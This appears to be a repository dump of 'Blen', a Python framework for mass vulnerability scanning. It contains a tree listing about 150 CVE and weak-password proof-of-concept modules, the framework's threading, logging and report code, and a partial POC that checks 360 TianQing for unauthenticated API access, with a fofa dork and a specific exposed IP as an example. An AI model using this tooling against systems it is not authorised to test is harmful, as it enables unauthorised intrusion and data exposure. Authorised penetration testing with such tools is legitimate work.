├── .gitignore
├── LICENSE
├── README.md
├── blen.py
├── blen_settings.json
├── data
├── 95955.mp3
└── user_agents.txt
├── docs
├── CHANGELOG.md
└── CODING.md
├── img
├── 009.png
├── 10.jpg
├── 3.png
└── logo.jpg
├── info.ini
├── lib
├── __init__.py
├── __init__.pyc
├── core
│ ├── __init__.py
│ ├── __init__.pyc
│ ├── center.py
│ ├── common.py
│ ├── common.pyc
│ ├── data.py
│ ├── enums.py
│ ├── htmloutput.py
│ ├── htmloutput.pyc
│ ├── log.py
│ ├── output.py
│ ├── poc.py
│ └── threads.py
├── fofa.ini
├── fofa.py
└── thirdparty
│ ├── __init__.py
│ └── ansistrm
│ ├── __init__.py
│ └── ansistrm.py
└── poc
├── 360
└── TianQing_Unauth_Acceess
│ └── poc.py
├── ACME
└── File_Read_mini_httpd_CVE_2018_18778
│ └── poc.py
├── Alibaba_Canal
└── Weak_Pass
│ └── poc.py
├── Alibaba_Druid
└── Unauth_Access
│ └── poc.py
├── Alibaba_FastJson
└── RCE_CVE_2017_18349
│ └── poc.py
├── Alibaba_Nacos
└── Unauth_Access
│ └── poc.py
├── Apache_ActiveMQ
├── Physical_Path_Disclosure
│ └── poc.py
├── RCE_FileServer_CVE_2016_3088
│ └── poc.py
└── WeakPass
│ └── poc.py
├── Apache_ActiveUC
└── Active_UC_Info_Disclosure
│ └── poc.py
├── Apache_ApiSix
├── DashBoard_Auth_Bypass_CVE_2021_45232
│ └── poc.py
└── Default_Key_CVE_2020_13945
│ └── poc.py
├── Apache_CouchDB
└── Priv_Escalation_CVE_2017_12635
│ └── poc.py
├── Apache_Druid
└── File_Read_CVE_2021_36749
│ └── poc.py
├── Apache_Flink
├── Dir_Traversal_CVE-2020-17519
│ └── poc.py
└── RCE_CVE_2020_17518
│ └── poc.py
├── Apache_Kylin
└── Conf_Info_Disclosure_CVE_2020_13937
│ └── poc.py
├── Apache_Mod_jk
└── ACbypass_CVE_2018_11759
│ └── poc.py
├── Apache_Solr
├── CVE_2019_17558
│ └── poc.py
├── File_Read
│ └── poc.py
├── RCE_Log4j_CVE_2021_44228
│ └── poc.py
└── Unauth_Access
│ └── poc.py
├── AtlassianConfluence
└── RCE_FileServer_CVE_2022_26134
│ └── poc.py
├── BSPHP
└── Info_Disclosure
│ └── poc.py
├── Bithighway_碧海威
└── Weak_Pass_L7
│ └── poc.py
├── Brother MFC-L2730DW
└── Weak_Pass
│ └── poc.py
├── C_Lodop
└── File_Read
│ └── poc.py
├── China_Mobile_中国移动
└── Info_Disclosure_Yu_routing_ExportSettings
│ └── poc.py
├── China_TeleCOM_中国电信
├── RCE_F460_GateWay
│ └── poc.py
└── Weak_Pass_DaTang_AC_Manager
│ └── poc.py
├── Confluence
└── OGNL_Injection_CVE_2021_26084
│ └── poc.py
├── Coremail
└── Conf_Info_Disclosure
│ └── poc.py
├── CtCMS_赤兔CMS
└── Get_Banner
│ └── poc.py
├── DVR
└── Login_Bypass_CVE_2018_9995
│ └── poc.py
├── D_Link
├── RCE_ShareCenter_system_mgr_cgi
│ └── poc.py
├── UPInfo_Disclosure_getcfg_php_CVE_2019_17506
│ └── poc.py
└── Weak_Pass_AC_Manager
│ └── poc.py
├── DedeCMS_织梦
├── Info_Disclosure_IIS_Short_Filename
│ └── poc.py
└── RadminPass
│ └── poc.py
├── DocCMS
└── SQLi_keyword
│ └── poc.py
├── DrayTek
└── RCE_CVE_2020_8515
│ └── poc.py
├── Drupal!
└── RCE_CVE_2018_7600
│ └── poc.py
├── ECShop
├── RCE_2dotX_OR_3dotX
│ └── poc.py
└── SQLi_delete_cart_goods
│ └── poc.py
├── Elasticsearch
├── Cmd_Exec_MVEL_CVE-2014-3120
│ └── poc.py
├── Code_Exec_Groovy_CVE-2015-1427
│ └── poc.py
├── Dir_Traversal_CVE-2015-5531
│ └── poc.py
├── File_Create_WooYun-2015-110216
│ └── poc.py
└── Unauth_Access
│ └── poc.py
├── Eyou_亿邮
└── RCE_moni_detail
│ └── poc.py
├── F5_BIG_IP
├── File_Read_CVE_2020_5902
│ └── poc.py
└── RCE_CVE_2021-22986
│ └── poc.py
├── FLIR_菲力尔
└── Download_File_AX8
│ └── poc.py
├── Grafana
└── File_Read_plugins
│ └── poc.py
├── H2_DataBase
└── UnAuth_Access
│ └── poc.py
├── H3C
└── File_Download_SecPath_WAF
│ └── poc.py
├── H5S_视频平台
└── Info_Disclosure
│ └── poc.py
├── HIKVISION
├── File_Down_Gateway_downFile_php
│ └── poc.py
├── File_Read_Stream_Media_Manager
│ └── poc.py
└── Weak_Pass_Stream_Media_Manager
│ └── poc.py
├── HJ_宏景
└── File_Read
│ └── poc.py
├── HST_好视通
├── File_Download
│ └── poc.py
└── File_Read
│ └── poc.py
├── HT_华天OA
└── Sqli_ApiController
│ └── poc.py
├── Hongdian_宏电
└── Backstage_File_Read_CVE_2021_28152
│ └── poc.py
├── Huawei
├── File_Read_HG659_lib
│ └── poc.py
└── Info_Disclosure_DG8045
│ └── poc.py
├── HuiWen_汇文
├── Info_Disclosure
│ └── poc.py
└── Weak_Pass
│ └── poc.py
├── IFW8_蜂网互联
└── UPInfo_DisClosure_CVE_2019_16313
│ └── poc.py
├── IRADVC3325_佳能打印机
└── Unauth_Access
│ └── poc.py
├── InfluxDB
├── FingerPrint
│ └── poc.py
└── UnAuth_Access
│ └── poc.py
├── Intelbras
└── UPInfo_Disclosure_CVE_2021_3017
│ └── poc.py
├── JDFreeFuck
└── Weak_Pass
│ └── poc.py
├── Jboss
└── Unauth_Access
│ └── poc.py
├── Jenkins
└── Unauth_Access
│ └── poc.py
├── Jetty
├── File_Read_CVE_2021_34429
│ └── poc.py
├── FingerPrint
│ └── poc.py
├── Info_Disclosure_CVE_2021_28164
│ └── poc.py
└── Info_Disclosure_CVE_2021_28169
│ └── poc.py
├── Jinher_金和OA
└── File_Read_download_jsp
│ └── poc.py
├── KEDACOM_数字系统接入网关
└── File_Read
│ └── poc.py
├── Kingdee_金蝶
├── Dir_List_server_file
│ └── poc.py
└── File_Down_fileDownload_do
│ └── poc.py
├── Kyan
└── Info_Disclosure
│ └── poc.py
├── LR_龙软科技
└── Info_Disclosure
│ └── poc.py
├── Landray_蓝凌OA
└── File_Read_CNVD_2021_28277
│ └── poc.py
├── Lanproxy
├── Lanproxy_File_Read
│ └── poc.py
└── Weak_Pass
│ └── poc.py
├── Laravel_Framework
└── Conf_Info_Disclosure_dot_env
│ └── poc.py
├── LiPu_利谱第二代防火墙
└── Info_Disclosure
│ └── poc.py
├── LinkSeek_朗驰欣创
└── FTP_Account_Info_Disclosure
│ └── poc.py
├── MY_木云科技
└── Unauth_Access
│ └── poc.py
├── MaiPu_迈普
└── File_Download_webui
│ └── poc.py
├── MailGard_佑友
├── RCE_ping_FireWall
│ └── poc.py
└── Weak_Pass_FireWall
│ └── poc.py
├── MessageSolution
└── Info_Disclosure
│ └── poc.py
├── Metabase
└── File_Read_CVE_2021_41277
│ └── poc.py
├── MicroSoft
└── RCE_CVE_2022_21907
│ └── poc.py
├── NSoft_新软
└── FileRead_EWEBS
│ └── poc.py
├── NatShell_蓝海卓越
├── File_Read
│ └── poc.py
└── HashInfo_DisClosure
│ └── poc.py
├── NetPower_中科网威
└── UPInfo_DisClosure_Firewall
│ └── poc.py
├── Node.js
├── Cmd_inj_CVE_2021_21315
│ └── poc.py
└── Dir_Traversal_CVE_2017_14849
│ └── poc.py
├── OKI
└── UnAuth_MC573
│ └── poc.py
├── PHPStudy
└── Back_Door
│ └── poc.py
├── PHPUnit
└── RCE_eval_stdin
│ └── poc.py
├── PearProject_梨子项目管理系统
└── Conf_Info_Disclosure_env
│ └── poc.py
├── PuYuan
├── Config_Info_Disclosure
│ └── poc.py
└── Info_Disclosure
│ └── poc.py
├── QZSec_齐治
└── AnyUser_Login_Fortress_Machine
│ └── poc.py
├── Redis
└── Unauth_Access
│ └── poc.py
├── Ruijie_锐捷
├── Dir_List_Cloud_ClassRoom
│ └── poc.py
├── File_Read_EG_userAuth
│ └── poc.py
├── RCE_EWEB_Manager_CNVD_2021_09650
│ └── poc.py
├── RCE_NBR_1300G
│ └── poc.py
├── RCE_SmartWeb_WEB_VMS
│ └── poc.py
├── UPInfo_DisClosure_RG_UAC_CNVD_2021_14536
│ └── poc.py
└── Unauth_Access
│ └── poc.py
├── RuoYi_若依
└── Weak_Pass
│ └── poc.py
├── SANGFOR_深信服
└── RCE_2020_EDR
│ └── poc.py
├── Samsung
├── Lfi_Samsung_Wlan_AP
│ └── poc.py
└── RCE_Samsung_WLANAP_WEA453e
│ └── poc.py
├── Sapido
└── RCE_BRC70n_Router
│ └── poc.py
├── SeeYon_致远
├── File_Download
│ └── poc.py
└── File_Upload_ajax_do
│ └── poc.py
├── ShiZiYu_狮子鱼
├── Sqli_ApiController
│ └── poc.py
└── Sqli_ApigoodsController
│ └── poc.py
├── ShopXO
└── FileRead_CNVD_2021_15822
│ └── poc.py
├── SonarQube
└── Info_Disclosure_CVE_2020_27986
│ └── poc.py
├── SonicWall_SSL_VPN
└── RCE_jarrewrite
│ └── poc.py
├── TCC_斗象
└── Weak_Pass_ARL
│ └── poc.py
├── TVT_同为股份
└── Dir_Traversal_NVMS_1000
│ └── poc.py
├── TamronOS_IPTV
├── Info_Disclosure
│ └── poc.py
├── RCE_api_ping
│ └── poc.py
└── User_Add_Submit
│ └── poc.py
├── Thinkphp
├── RCE_5022_5129
│ └── poc.py
└── RCE_5023
│ └── poc.py
├── Tongda_通达OA
├── AnyUser_Login_Version2017
│ └── poc.py
├── Computer_Name_Plugin
│ └── poc.py
├── Sql_inj_TongDa
│ └── poc.py
└── Version_Info_Plugin
│ └── poc.py
├── UTT_艾泰科技
└── WeakPass_Net_Manager_System
│ └── poc.py
├── VMware
├── File_read_vCenter
│ └── poc.py
└── SSRF_vRealize_CVE_2021_21975
│ └── poc.py
├── Venustech_启明星辰
└── SQLi_Reportguide
│ └── poc.py
├── VoIPmonitor
└── RCE_CVE_2021_30461
│ └── poc.py
├── WayosAC
└── WayosAC
│ └── poc.py
├── Weaver_泛微OA
├── Config_Info_Disclosure_DBconfigReader
│ └── poc.py
├── Config_Info_Disclosure_E_Cology_V9
│ └── poc.py
├── File_Read_E_Bridge
│ └── poc.py
├── File_Upload_E_Office_V9_CNVD_2021_49104
│ └── poc.py
├── File_Upload_E_Office_ajax
│ └── poc.py
├── File_Upload_V9_uploadOperation
│ └── poc.py
├── Log_Disclosure
│ └── poc.py
├── RCE_Beanshell
│ └── poc.py
├── SQLi_E_Office_v9dot5
│ └── poc.py
├── Sql_Inj_E_cology_WorkflowCenterTreeData
│ └── poc.py
└── Sql_inj_E_cology_V8
│ └── poc.py
├── Weblogic
├── CVE_2016_0638
│ └── poc.py
├── CVE_2017_10271
│ └── poc.py
├── RCE_CVE_2018_3191
│ └── poc.py
├── SSRF_CVE_2014_4210
│ └── poc.py
├── UnAuth_RCE_CVE_2020_14882
│ └── poc.py
└── XMLDecoder_CVE_2017_3506
│ └── poc.py
├── Yonyou_用友NC
├── Dir_List_ERP
│ └── poc.py
├── RCE_BeanShell_CNVD_2021_30167
│ └── poc.py
└── Sqli_CNNVD_201610_923
│ └── poc.py
├── Zabbix
└── Weak_Pass
│ └── poc.py
├── Zentao_禅道
└── Getshell_test
│ └── poc.py
├── ZeroShell
└── RCE_kerbynet
│ └── poc.py
├── Zyxel
└── Login_Pass_NBG2105
│ └── poc.py
├── common
├── Apache_Dir_List
│ └── poc.py
├── Git_Info_Disclosure
│ └── poc.py
├── Svn_Info_Disclosure
│ └── poc.py
└── Url_Alive
│ └── poc.py
├── demo
└── demo
│ └── poc.py
├── jellyfin
├── File_Read_CVE_2021_21402
│ └── poc.py
└── SSRF_CVE_2021_29490
│ └── poc.py
├── php
└── Backdoor_v8dev
│ └── poc.py
├── 一指通
└── XiaMen_Yizhitong_Weak_pass
│ └── poc.py
└── 中硅技术
└── ZhongGuijishu_Unauth_Access
└── poc.py
/.gitignore:
--------------------------------------------------------------------------------
1 | # Build and Release Folders
2 | bin-debug/
3 | bin-release/
4 | [Oo]bj/
5 | [Bb]in/
6 |
7 | # Other files and folders
8 | .settings/
9 |
10 | # Executables
11 | *.swf
12 | *.air
13 | *.ipa
14 | *.apk
15 |
16 | test/
17 | output/
18 | log/
19 | scan/
20 | .vscode/
21 | Future_Alpha版/
22 | poc/ACTI_视频监控/
23 | poc/*/_*/
24 | poc/PRO/
25 |
26 | reference.*
27 | reference*.png
28 | reference/
29 | secret/
30 |
31 | .DS_Store
32 | # CODING.md
33 | FETURE.md
34 |
35 | *honeypot*.md
36 |
37 |
38 | # Project files, i.e. `.project`, `.actionScriptProperties` and `.flexProperties`
39 | # should NOT be excluded as they contain compiler settings and other important
40 | # information for Eclipse / Flash Builder.
41 |
--------------------------------------------------------------------------------
/blen.py:
--------------------------------------------------------------------------------
1 | # coding: utf-8
2 | from __future__ import print_function
3 |
4 | import os
5 | import sys
6 | import argparse
7 | import logging
8 | import time
9 | import threading
10 | import configparser
11 | import requests
12 | import ctypes
13 | import inspect
14 | import subprocess
15 | import re
16 |
17 |
18 | import lib.core
19 | from lib.core.data import root_path
20 |
21 | from lib.core.common import get_local_version
22 | from lib.core.center import oFxCenter
44 |
45 |
46 |
47 | def main():
48 |
49 | print(logo)
50 |
51 | ofxcenter = oFxCenter()
52 |
53 |
54 |
55 | if __name__ == "__main__":
56 | main()
--------------------------------------------------------------------------------
/blen_settings.json:
--------------------------------------------------------------------------------
1 | {
2 | "defaultContext": {
3 | "account": null,
4 | "database": null,
5 | "schema": null
6 | },
7 | "scripts": []
8 | }
--------------------------------------------------------------------------------
/data/95955.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/data/95955.mp3
--------------------------------------------------------------------------------
/img/009.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/img/009.png
--------------------------------------------------------------------------------
/img/10.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/img/10.jpg
--------------------------------------------------------------------------------
/img/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/img/3.png
--------------------------------------------------------------------------------
/img/logo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/img/logo.jpg
--------------------------------------------------------------------------------
/info.ini:
--------------------------------------------------------------------------------
1 | [info]
2 |
3 | version = 2.23.7
4 |
5 | author = "openx"
6 |
7 | [ceye]
8 |
9 | dns = xxxxx.ceye.io
10 |
11 | token = gvfdsert6y7u8iknjbgvcfdr5t678uiokjhgfrt6y7
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/__init__.py
--------------------------------------------------------------------------------
/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/__init__.pyc
--------------------------------------------------------------------------------
/lib/core/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 |
4 | try:
5 | os.path.dirname(os.path.realpath(__file__))
6 | except Exception:
7 | err_msg = "your system does not properly handdle non-Ascii path"
8 | err_msg += "please move this Blen's directory to other location"
9 | exit(err_msg)
10 |
11 | from lib.core.data import root_path
12 |
13 | def check_environment():
14 | from lib.core.data import PYVERSION
15 | if PYVERSION.split(".")[0] == "2":
16 | err_msg = "Blen does not support python2"
17 | exit(err_msg)
18 | check_environment()
19 |
20 |
21 | def oFx_Refuse_Win():
22 | from lib.core.data import IS_WIN
23 | if IS_WIN:
24 | err_msg = "Blen does not support windows system, Kali Linux is recommended"
25 | exit(err_msg)
26 | # oFx_Refuse_Win()
27 |
28 |
29 | def oFx_Init():
30 | from lib.core.data import log_path,output_path,scan_path
31 | if not os.path.exists(log_path):
32 | os.makedirs(log_path)
33 |
34 | if not os.path.exists(output_path):
35 | os.makedirs(output_path)
36 |
37 | if not os.path.exists(scan_path):
38 | os.makedirs(scan_path)
39 | oFx_Init()
40 |
41 | def clear_relog():
42 | from lib.core.data import now
43 | from lib.core.data import output_path,log_path
44 | deadline = int(now) - 12*60*60
45 | for i in os.listdir(output_path):
46 | try:
47 | if int(i.split(".")[0]) <= deadline :
48 | os.remove(output_path+i)
49 | except:
50 | pass
51 | for i in os.listdir(log_path):
52 | try:
53 | if int(i.split(".")[0]) <= deadline :
54 | os.remove(log_path+i)
55 | except:
56 | pass
57 | clear_relog()
58 |
59 | sys.path.append(root_path)
60 | # exit("test success")
--------------------------------------------------------------------------------
/lib/core/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/core/__init__.pyc
--------------------------------------------------------------------------------
/lib/core/common.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/core/common.pyc
--------------------------------------------------------------------------------
/lib/core/data.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import time
4 | import os
5 | import queue
6 | import threading
7 | import sys
8 |
9 | now=str(int(time.time()))
10 |
11 | root_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
12 | log_path = root_path+"/log/"
13 | output_path = root_path+"/output/"
14 | scan_path = root_path + "/scan/"
15 | poc_path = root_path + "/poc/"
16 |
17 | MAX_NUMBER_OF_THREADS = 50
18 | IS_WIN = True if (sys.platform in ["win32", "cygwin"] or os.name == "nt") else False
19 | PYVERSION = sys.version.split()[0].split(".")[0]
20 |
21 | qu = queue.Queue()
22 | allpoc = queue.Queue()
23 |
24 | vulnoutput=dict()
25 | unvulnoutput=[]
26 | unreachoutput=[]
27 |
28 | lock=threading.Lock()
29 |
30 | AliveTest = queue.Queue()
31 | AliveList = set()
--------------------------------------------------------------------------------
/lib/core/enums.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | class CUSTOM_LOGGING:
4 | LOGO = 21
5 | VULN = 22
6 | UNVULN = 23
7 | NETEERROR = 24
--------------------------------------------------------------------------------
/lib/core/htmloutput.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | def output_html(filename,vulnlist,unvulnlist,errorlist):
3 | newvulnlist = ["
"+i+"
" for i in vulnlist]
4 | newunvulnlist = [""+i+"
" for i in unvulnlist]
5 | newerrorlist = [""+i+"
" for i in errorlist]
6 |
7 | vulnstr=""
8 | for i in newvulnlist:
9 | vulnstr+=i
10 | unvulnstr=""
11 | for i in newunvulnlist:
12 | unvulnstr+=i
13 | errorstr=""
14 | for i in newerrorlist:
15 | errorstr+=i
16 |
17 | with open("output/%s"%(filename),"w") as f:
18 | f.write(html%(vulnstr,unvulnstr,errorstr))
19 |
20 | html="""
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | Blen Report
29 |
30 |
71 |
72 |
73 | Blen Report
74 |
75 |
76 | vuln list
77 | %s
78 |
79 |
80 | unvuln list
81 | %s
82 |
83 |
84 | unreach list
85 | %s
86 |
87 |
88 |
89 | powered by Blen
90 |
91 |
92 |
93 | """
--------------------------------------------------------------------------------
/lib/core/htmloutput.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/core/htmloutput.pyc
--------------------------------------------------------------------------------
/lib/core/log.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import logging
4 | from lib.core.data import now,root_path
5 | from lib.core.enums import CUSTOM_LOGGING
6 |
7 | logging.addLevelName(CUSTOM_LOGGING.LOGO, "(∩ᵒ̴̶̷̤⌔ᵒ̴̶̷̤∩)")
8 | logging.addLevelName(CUSTOM_LOGGING.VULN, "~o(〃'▽'〃)o")
9 | logging.addLevelName(CUSTOM_LOGGING.UNVULN, "ε(┬┬﹏┬┬)3")
10 | logging.addLevelName(CUSTOM_LOGGING.NETEERROR, "(*• . •*)?")
11 |
12 | logger = logging.getLogger("oFx_l0g")
13 | logger.setLevel(logging.DEBUG)
14 | formatter = logging.Formatter("%(asctime)s - %(levelname)s: %(message)s")
15 |
16 |
17 | # use filehandler
18 | FILE_HANDLE = logging.FileHandler("%s.log" % (root_path + "/log/" + now))
19 | FILE_HANDLE.setLevel(logging.DEBUG)
20 | FILE_HANDLE.setFormatter(formatter)
21 |
22 | # use streamhandler
23 | STREAM_HANDLE = None
24 | try:
25 | from lib.thirdparty.ansistrm.ansistrm import ColorizingStreamHandler
26 | disableColor = False
27 |
28 | if disableColor:
29 | LOGGER_HANDLER = logging.StreamHandler()
30 | else:
31 | LOGGER_HANDLER = ColorizingStreamHandler()
32 | LOGGER_HANDLER.level_map[logging.getLevelName("(∩ᵒ̴̶̷̤⌔ᵒ̴̶̷̤∩)")] = (None, "yellow", False)
33 | LOGGER_HANDLER.level_map[logging.getLevelName("~o(〃'▽'〃)o")] = (None, "green", False)
34 | LOGGER_HANDLER.level_map[logging.getLevelName("ε(┬┬﹏┬┬)3")] = (None, "blue", False)
35 | LOGGER_HANDLER.level_map[logging.getLevelName("(*• . •*)?")] = (None, "cyan", False)
36 | except:
37 | pass
38 | finally:
39 | STREAM_HANDLE = logging.StreamHandler()
40 |
41 |
42 |
43 | STREAM_HANDLE.setLevel(logging.DEBUG)
44 | STREAM_HANDLE.setFormatter(formatter)
45 |
46 | # add Handler
47 | logger.addHandler(FILE_HANDLE)
48 | logger.addHandler(STREAM_HANDLE)
49 |
50 | def loglogo(message):
51 | print("\033[33m")
52 | logger.log(CUSTOM_LOGGING.LOGO,message)
53 |
54 | def logvuln(message):
55 | print("\033[32m")
56 | logger.log(CUSTOM_LOGGING.VULN,message)
57 |
58 | def logunvuln(message):
59 | print("\033[34m")
60 | logger.log(CUSTOM_LOGGING.UNVULN,message)
61 |
62 | def logverifyerror(message):
63 | print("\033[36m")
64 | logger.log(CUSTOM_LOGGING.NETEERROR,message)
65 |
66 | def logwarning(message):
67 | # print("\033[35m")
68 | logger.warning(message)
69 |
70 | def logcritical(message):
71 | # print("\033[31m")
72 | logger.critical(message)
73 |
--------------------------------------------------------------------------------
/lib/core/output.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | from lib.core.log import loglogo
3 |
4 | def Txt_output(filename,output_dict,target_list):
5 | with open(filename,"w") as f:
6 | for vuln_name in output_dict:
7 | loglogo("漏洞名:%s"%(vuln_name))
8 | f.write(vuln_name+"\n")
9 | loglogo("共测试url %d 条, %d 条存在漏洞"%(len(target_list),len(output_dict[vuln_name])))
10 | for vuln_url in output_dict[vuln_name]:
11 | f.write(vuln_url.split("||")[0].strip()+"\n")
12 | f.write("\n\n")
13 | loglogo("TXT格式报告输出至:%s"%(filename))
14 |
15 | doc = ""
16 | def Mkdn_output(filename,output_dict,target_list,actual_list,total_time):
17 | global doc
18 | doc += "检测报告
\n\n\n\
19 | ```\n\
20 | Blen :: order by jijue\n\
21 | ```\n\n"
22 | doc += "|条目|数值|\n|-|-|\n|预计测试条数|{target_list_length}|\n|实际测试条数|{actual_list_length}|\n|共计耗时|{total_time}秒|\n\n".format(target_list_length = len(target_list),actual_list_length = len(actual_list),total_time = total_time)
23 | for poc_name in output_dict:
24 | doc += "### {}\n".format(poc_name)
25 | doc += "|url|title|\n"
26 | doc += "|-|-|\n"
27 | for vuln_url in output_dict[poc_name]:
28 |
29 | web_title = vuln_url.split("||")[1].strip()
30 |
31 | doc += "|{}|{}|\n".format(vuln_url.split("||")[0],web_title)
32 |
33 | with open(filename,"w") as f:
34 | f.write(doc)
35 | loglogo("Markdown格式报告输出至:%s"%(filename))
36 |
37 | csv_doc = """
38 | 检测报告,,,,,
39 | ,,,,,
40 | ,,,,,
41 | Blen :: order by jijue,,,,,
42 | ,,,,,
43 | ,,,,,
44 | 条目,数值,
45 | 预计测试条数,{target_list_length}条,
46 | 实际测试条数,{actual_list_length}条,
47 | 共计耗时,{total_time}秒,
48 | ,,,,,
49 | ,,,,,\n
50 | """
51 | def Csv_output(filename,output_dict,target_list,actual_list,total_time):
52 | global csv_doc
53 | csv_doc = csv_doc.format(target_list_length = len(target_list),actual_list_length = len(actual_list),total_time = total_time)
54 |
55 | for poc_name in output_dict:
56 | csv_doc += "{},\nurl,title,,\n".format(poc_name)
57 | for vuln_url in output_dict[poc_name]:
58 | web_title = vuln_url.split("||")[1].strip()
59 | csv_doc += "{vuln_url},{web_title},\n".format(vuln_url=vuln_url.split("||")[0],web_title=web_title)
60 | csv_doc += ",,,,,\n,,,,,\n"
61 | with open(filename,"w") as f:
62 | f.write(csv_doc)
63 | loglogo("CSV格式报告输出至:%s" % (filename))
--------------------------------------------------------------------------------
/lib/core/threads.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import time
4 | import threading
5 | import traceback
6 |
7 | from lib.core.log import logwarning,loglogo
8 | from lib.core.data import MAX_NUMBER_OF_THREADS
9 |
10 | def exception_handled_function(thread_function, args=(), silent=False):
11 | try:
12 | thread_function(*args)
13 | except KeyboardInterrupt:
14 | raise
15 | except Exception as ex:
16 | logwarning("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
17 | logwarning(traceback.format_exc())
18 |
19 | def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
20 | threads = []
21 |
22 | try:
23 | if num_threads > 1:
24 | if start_msg:
25 | info_msg = "starting {0} threads".format(num_threads)
26 | loglogo(info_msg)
27 |
28 | if num_threads > MAX_NUMBER_OF_THREADS:
29 | warn_msg = "starting {0} threads, more than MAX_NUMBER_OF_THREADS:{1}".format(num_threads, MAX_NUMBER_OF_THREADS)
30 | logwarning(warn_msg)
31 | num_threads = MAX_NUMBER_OF_THREADS
32 |
33 | else:
34 | thread_function(*args)
35 | return
36 |
37 | # Start the threads
38 | for num_threads in range(num_threads):
39 | thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
40 | args=(thread_function, args))
41 | try:
42 | thread.start()
43 | except KeyboardInterrupt as e:
44 | raise KeyboardInterrupt
45 | except Exception as ex:
46 | err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
47 | logwarning(err_msg)
48 | break
49 |
50 | threads.append(thread)
51 | alive = True
52 | while alive:
53 | alive = False
54 | for thread in threads:
55 | if thread.is_alive():
56 | alive = True
57 | time.sleep(0.1)
58 | except (KeyboardInterrupt) as ex:
59 | loglogo("user aborted (Ctrl+C was pressed multiple times")
60 | if forward_exception:
61 | pass
62 | # exit()
63 |
64 | except Exception as ex:
65 | logwarning("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
66 | logwarning(traceback.format_exc())
67 |
68 | finally:
69 | return
--------------------------------------------------------------------------------
/lib/fofa.ini:
--------------------------------------------------------------------------------
1 | [Fofa]
2 | user =
3 | key =
4 |
5 |
--------------------------------------------------------------------------------
/lib/thirdparty/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/thirdparty/__init__.py
--------------------------------------------------------------------------------
/lib/thirdparty/ansistrm/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/thirdparty/ansistrm/__init__.py
--------------------------------------------------------------------------------
/poc/360/TianQing_Unauth_Acceess/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 |
11 | class POC(POCBase):
12 |
13 |
14 | _info = {
15 | "author" : "jijue", # POC作者
16 | "version" : "1", # POC版本,默认是1
17 | "CreateDate" : "2021-06-09", # POC创建时间
18 | "UpdateDate" : "2021-06-09", # POC创建时间
19 | "PocDesc" : """
20 | 略
21 | """, # POC描述,写更新描述,没有就不写
22 |
23 | "name" : "天擎数据库未授权访问导致信息泄露漏洞", # 漏洞名称
24 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
25 |
26 | "AppName" : "360天擎数据库", # 漏洞应用名称
27 | "AppVersion" : "", # 漏洞应用版本
28 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
29 | "VulnDesc" : """
30 | 天擎 存在未授权越权访问,造成敏感信息泄露
31 | """, # 漏洞简要描述
32 |
33 | "fofa-dork":"""
34 | title="360新天擎"
35 | """, # fofa搜索语句
36 | "example" : "https://183.166.187.208:8443/api/dbstat/gettablessize", # 存在漏洞的演示url,写一个就可以了
37 | "exp_img" : "", # 先不管
38 |
39 | }
40 |
41 | timeout = 10
42 |
43 | def _verify(self):
44 | """
45 | 返回vuln
46 |
47 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
48 |
49 | 不存在漏洞:vuln = [False,""]
50 | """
51 | vuln = [False,""]
52 | url = self.target + "/api/dbstat/gettablessize" # url自己按需调整
53 |
54 |
55 |
56 | headers = {"User-Agent":get_random_ua(),
57 | "Connection":"close",
58 | # "Content-Type": "application/x-www-form-urlencoded",
59 | }
60 |
61 | try:
62 | """
63 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
64 | """
